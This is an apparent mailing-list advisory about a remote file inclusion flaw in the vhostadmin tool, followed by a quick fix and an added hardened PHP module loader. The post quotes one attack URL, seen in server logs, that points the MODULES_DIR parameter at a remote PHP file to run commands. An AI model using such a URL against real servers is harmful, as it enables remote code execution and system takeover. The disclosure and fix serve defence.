I know this is not exactly vpopmail related, but as it's a vpopmail related tool I thought others here would like to be made aware of this.

I have been using vhostadmin for a while now, and have just noticed that it is vulnerable to an XSS attack which could lead to the underlying system being cracked. The problem is the $MODULES_DIR var is not being protected against injection of a remote path and simply accepts whatever is passed to it, such as:

http://server/path/to/vhostadmin/modules/main.php?MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3d

A quick fix is to change global.inc and change

$MODULES_DIR = 'modules';

to

define("MODULES_DIR", "modules");

and then change all references in any file it appears in of $MODULES_DIR to MODULES_DIR, and comment out any references to global $MODULES_DIR; to //global $MODULES_DIR;

There may be other issues, but this one I came across yesterday when I noticed the above formatted URL in the Apache logs. Also, we have modified some of the system ourselves, so it is entirely possible that we may be partly to blame for some or all of this, but it would certainly be worth watching out for if you are using the system.

Regards,
Shane
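The fix above, written out as an added example (not vhostadmin's own code): the constant replaces the overwritable global, and the module loader additionally checks the requested module name against an allow-list and confirms the resolved path stays inside the modules directory. The modules/ location, the module names and the "module" query parameter are assumptions for illustration.

```php
<?php
// global.inc replacement: a constant cannot be overwritten via the query string
// the way a global variable can under register_globals, so ?MODULES_DIR=http://...
// no longer changes where include() reads from.
define("MODULES_DIR", __DIR__ . "/modules");

// Hypothetical allow-list of the module files this install actually ships.
$allowed_modules = array("main", "domains", "users");

function load_module($name, array $allowed)
{
    // Only a known module name is accepted; anything else ("../x", "http://...",
    // names with a NUL byte) is rejected before include() is ever reached.
    if (!is_string($name) || !in_array($name, $allowed, true)) {
        return false;
    }
    $base = realpath(MODULES_DIR);
    $path = realpath(MODULES_DIR . "/" . $name . ".php");
    // Defence in depth: the resolved file must still sit below MODULES_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// The module name may come from the request; the directory never does.
$module = isset($_GET['module']) ? $_GET['module'] : 'main';
if (!load_module($module, $allowed_modules)) {
    header("HTTP/1.0 400 Bad Request");
    echo "unknown module";
}
```

Independently of the code change, setting allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) to Off in php.ini stops include() from fetching remote files at all, which is worth checking on any host running this tool.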
